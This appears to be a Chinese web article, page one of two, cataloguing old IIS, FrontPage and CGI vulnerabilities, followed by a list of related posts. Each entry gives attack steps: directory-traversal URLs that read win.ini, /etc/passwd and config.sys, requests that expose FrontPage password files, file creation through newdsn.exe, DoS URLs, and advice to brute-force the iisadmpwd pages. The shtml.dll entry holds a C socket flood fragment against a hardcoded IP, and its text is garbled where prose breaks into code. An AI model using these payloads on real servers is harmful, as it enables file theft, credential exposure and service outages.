一些收集到的经典漏洞详解第1/2页

☆carbo.dll☆

iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,

这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).

攻击方法:

提交这样的http请求 :

http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

http会做如下回应:

[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]

Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'

查看win.ini文件: c:\winnt\win.ini:

http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

___________________________________________________________________________

☆uploader.exe☆

如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。

攻击方法: http://host/cgi-win/uploader.exe

会带你到上传页面,剩下的事就不用我告诉你了把?:)

___________________________________________________________________________

☆search97.vts☆

这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。

攻击方法: http://www.xxx.com/search97.vts

?HLNavigate=On&querytext=dcm

&ServerKey=Primary

&ResultTemplate=../../../../../../../etc/passwd

&ResultStyle=simple

&ResultCount=20

&collection=books

___________________________________________________________________________

☆newdsn.exe☆

个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,

利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。

攻击方法:

1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=

2. D.o.s攻击:提交下列连接请求:

http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase

如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:

- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。

- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,

如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase

IIS会产生保护性错误。

___________________________________________________________________________

☆service.pwd☆

http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.

攻击方法:

访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。

___________________________________________________________________________

☆users.pwd☆

UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。

攻击方法:

访问http://www.hostname.com/_vti_pvt/users.pwd。

___________________________________________________________________________

☆authors.pwd☆

UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。

攻击方法:

访问http://www.hostname.com/_vti_pvt/authors.pwd。

___________________________________________________________________________

☆administrators.pwd☆

UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。

攻击方法:

访问http://www.hostname.com/_vti_pvt/administrators.pwd。

___________________________________________________________________________

☆shtml.dll☆

在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息.

但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. http://TrustedServer如果用户点击

上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客

户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,

shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,

能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。

攻击方法:

1. 暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html

这样将返回以下信息:

Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.

2. 可信任站点执行脚本:使用如下格式的URL:

serv_addr.sin_family =AF_INET;

serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");

serv_addr.sin_port = htons(80);

if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)

{

printf("Create Socket faild \n");

return ;

}

if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)

{

printf("Connect faild \n");;

}

else

{

lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );

for (lDo = 0 ;lDo < 7000;lDo ++)

{

lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;

if (lLen < 0 )

{

printf("Send faild \n");

return;

}

}

lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;

//recv(sockfd,buffer,2000,0);

//printf(buffer);

//printf("\n");

}

closesocket(sockfd);

}

___________________________________________________________________________

☆shtml.exe☆

微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞,可能远程关闭一个web站点上的所有FrontPage操作。

通过提交一个包含DOS设备名的链接, FrontPage Server Extensions就会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。

攻击方法:

提交这样的链接,都可能使FrontPage Server Extensions停止响应: http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/

prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe

/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_

vti_bin/shtml.exe/com1 .

___________________________________________________________________________

☆queryhit.htm☆

如果queryhit.htm提出一个搜索页面,那么你便可以搜索和观看这些文件。

攻击方法:

访问http://www.victim.com/samples/search/queryhit.htm 如果是搜索页面,然后在查找文件对话框里输入以下字符串:

[#filename=*.pwd],如果屏幕上出现一长串连接到以[.pwd]为扩展名的密码文件的话,那就是所需要的东东了。

___________________________________________________________________________

☆Dotdotdot☆

vqServer及Sybase PowerDynamo网站服务器存在着一个老的攻击漏洞,此攻击是关于点点(..)的攻击,这是由于在WINDOW

中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击

者绕过WEB安全系统横贯到其他目录。

攻击方法:

假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys

列出根目录。 http://example.com/ /../../../../../../

___________________________________________________________________________

☆autoexec.bat☆

现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来

退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.

攻击方法: :8080/../../../autoexec.bat 这样将读取畹统中的autoexec.bat文件

这个漏洞的利用还取决于系统目录的结构而定.

___________________________________________________________________________

☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆

IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,

还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,

这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。

这个目录物理映射在下面的目录下:

c:\winnt\system32\inetsrv\iisadmpwd

攻击方法:

访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。

当前1/2页 12下一页阅读全文

(0)

相关推荐

  • 一些收集到的经典漏洞详解第1/2页

    ☆carbo.dll☆ iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞, 这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符). 攻击方法: 提交这样的http请求 : http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog http会做如下回应: [iCat Ca

  • JS闭包经典实例详解

    本文实例讲述了JS闭包.分享给大家供大家参考,具体如下: 之前花了很多时间看书上对闭包的介绍,也看了很多人的写的关于闭包的博客,然后我就以为自己懂了. 结果,下午在一个QQ群里,有人问了这道经典的闭包问题,如下图: 我告诉他去看书上的闭包介绍.告诉他之后,我想我自己要不也写一下,反正花不了多少时间,结果花了好久怎么写也不对.............. 后来看了看书上的,然后自己总结了下,觉得这次应该懂了.下次还不理解我就可以去跳楼了............ -------------------

  • Python实现大数据收集至excel的思路详解

    一.在工程目录中新建一个excel文件 二.使用python脚本程序将目标excel文件中的列头写入,本文省略该部分的code展示,可自行网上查询 三.以下code内容为:实现从接口获取到的数据值写入excel的整体步骤 1.整体思路: (1).根据每日调取接口的日期来作为excel文件中:列名为"收集日期"的值 (2).程序默认是每天会定时调取接口并获取接口的返回值并写入excel中(我使用的定时任务是:linux下的contab) (3).针对接口异常未正确返回数据时,使用特殊符号

  • 基于vue-cli3多页面开发apicloud应用的教程详解第1/2页

    之前开发项APP项目直接用APICloud+原生js的方式进行编写,整个项目下来发现开发慢,页面代码多且复杂,维护起来相对困难,而且文件大打包之后的APP会比较大,apicloud的框架也不好用,支持部分es67(像let.const.import等es6新特性不支持写的太难受了) 采用vue-cli+APIcloud的方式写解决以上痛点,开发灵活,并且打包之后体积更小速度更快 环境依赖 vue webpack vue-cli3 nodeJS 基本流程 项目开发最好准备两个项目,一个打包APP,

  • vue单页面改造多页面应用详解第1/2页

    单页面和多页面的区别这里就不细说了.我司业务适合多页面,许多小应用都是通过iframe整体嵌入的形式. 如果项目过于庞大,就会有很不好的体验问题. 拆分多个项目的话,又会有额外的开支,如服务器资源部署等问题. 基于此改造的目标 单独业务逻辑单独一个页面 可实现单命令打包 可单独打包 首先我们准备一个基础的项目,目录结构如下 src目录为我们平时开发的目录,dist为打包后的目录,整体结构如图 1 将当前项目改造成多页面目录 pages下为我们开发的目录文件,改造过程就是将原src下所有目录结构复

  • Oracle 11g收集多列统计信息详解

    前言 通常,当我们将SQL语句提交给Oracle数据库时,Oracle会选择一种最优方式来执行,这是通过查询优化器Query Optimizer来实现的.CBO(Cost-Based Optimizer)是Oracle默认使用的查询优化器模式.在CBO中,SQL执行计划的生成,是以一种寻找成本(Cost)最优为目标导向的执行计划探索过程.所谓成本(Cost)就是将CPU和IO消耗整合起来的量化指标,每一个执行计划的成本就是经过优化器内部公式估算出的数字值. 我们在写SQL语句的时候,经常会碰到w

  • 由php中字符offset特征造成的绕过漏洞详解

    php中的字符offset特性 php中的字符串存在一个非常有趣的特性,php中的字符串也可以像数组一样进行取值. $test = "hello world"; echo $test[0]; 最后的结果就是h. 但是上述的这种特性有时会有意想不到的效果,看下面这段代码 $mystr = "hello world"; echo $mystr["pass"]; 上述的代码的输出结果是h.这是为什么呢?其实很简单,和很多其他的语言一样,字符串在php中

  • JSP安全开发之XSS漏洞详解

    前言 大家好,好男人就是我,我就是好男人,我就是-0nise.在各大漏洞举报平台,我们时常会看到XSS漏洞.那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复? 正文 1.XSS?XSS?XSS是什么鬼? XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混.CSS(跨站脚本攻击),CSS(层叠样式表)傻傻分不清.所以就叫XSS咯. 2.XSS的危害是什

  • java 8如何自定义收集器(collector)详解

    需求: 将 一个容器List<Bean> 按照一定的字段进行分组,分组过后的值为特定的BEAN 里面的属性例如: 假定有这样一个Bean public class SubjectOberser{ private String subjectKey; private AbstractObserver abstractObserver; ...geter seter 方法... } 我们需要按照 subjectKey 进行分组,分组过后的内容 应该为这样一个容器Map<String,List

  • 跨站脚本执行漏洞详解与防护

    本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该漏洞.由于时间仓促,水平有限,本文可能有不少错误,希望大家不吝赐教. 声明,请不要利用本文介绍的任何内容,代码或方法进行破坏,否则一切后果自负! [漏洞成因]  原因很简单,就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换. [漏洞形式]  这里所说的形式,实际上是指CGI输入

随机推荐